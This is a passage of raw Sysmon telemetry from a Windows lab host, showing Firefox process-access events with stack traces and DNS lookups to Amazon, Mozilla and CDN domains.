Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.614{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:13.614{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.567{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.567{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.567{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.567{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.077{59A5CD1D-945A-6005-3305-00000000A301}7052images-eu.ssl-images-amazon.com0type: 5 m.media-amazon.com;type: 5 f.media-amazon.com;type: 5 
media.amazon.map.fastly.net;::ffff:151.101.13.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:12.950{59A5CD1D-945A-6005-3305-00000000A301}7052prod.topsites.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:12.937{59A5CD1D-945A-6005-3305-00000000A301}7052prod.topsites.prod.cloudops.mozgcp.net034.120.99.97;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:12.937{59A5CD1D-945A-6005-3305-00000000A301}7052topsites.services.mozilla.com0type: 5 prod.topsites.prod.cloudops.mozgcp.net;::ffff:34.120.99.97;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:10.635{59A5CD1D-8E56-6005-2E00-00000000A301}2464238.21.217.172.in-addr.arpa.0type: 12 fra16s13-in-f14.1e100.net;type: 12 fra16s13-in-f238.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000017371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.223{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla 
Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.223{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla 
Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.004{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.004{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla 
Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.004{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla 
Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.004{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 
10341000x800000000000000017402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.582{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.548{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.753{59A5CD1D-8E56-6005-2E00-00000000A301}246416.13.101.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.746{59A5CD1D-8E56-6005-2E00-00000000A301}2464201.194.224.13.in-addr.arpa.0type: 12 
server-13-224-194-201.fra2.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.745{59A5CD1D-8E56-6005-2E00-00000000A301}246411.173.248.3.in-addr.arpa.0type: 12 ec2-3-248-173-11.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.238{59A5CD1D-945A-6005-3305-00000000A301}7052images-na.ssl-images-amazon.com0type: 5 m.media-amazon.com;type: 5 f.media-amazon.com;type: 5 media.amazon.map.fastly.net;::ffff:151.101.13.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.112{59A5CD1D-945A-6005-3305-00000000A301}7052endpoint.prod.eu-west-1.forester.a2z.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.110{59A5CD1D-945A-6005-3305-00000000A301}7052endpoint.prod.eu-west-1.forester.a2z.com034.255.74.101;52.30.120.60;52.31.74.75;52.213.248.70;52.214.47.192;54.73.66.115;99.80.235.31;3.248.173.11;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.109{59A5CD1D-945A-6005-3305-00000000A301}7052fls-eu.amazon.de0type: 5 fls-eu.amazon.com;type: 5 gateway.prod.eu-west-1.forester.a2z.com;type: 5 endpoint.prod.eu-west-1.forester.a2z.com;::ffff:3.248.173.11;::ffff:34.255.74.101;::ffff:52.30.120.60;::ffff:52.31.74.75;::ffff:52.213.248.70;::ffff:52.214.47.192;::ffff:54.73.66.115;::ffff:99.80.235.31;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.107{59A5CD1D-945A-6005-3305-00000000A301}7052m.media-amazon.com0type: 5 
f.media-amazon.com;type: 5 media.amazon.map.fastly.net;::ffff:151.101.13.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.081{59A5CD1D-945A-6005-3305-00000000A301}7052media.amazon.map.fastly.net02a04:4e42:62::272;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.078{59A5CD1D-945A-6005-3305-00000000A301}7052media.amazon.map.fastly.net0151.101.13.16;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.192{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla 
Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.192{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.973{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program 
Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000017420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.973{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla 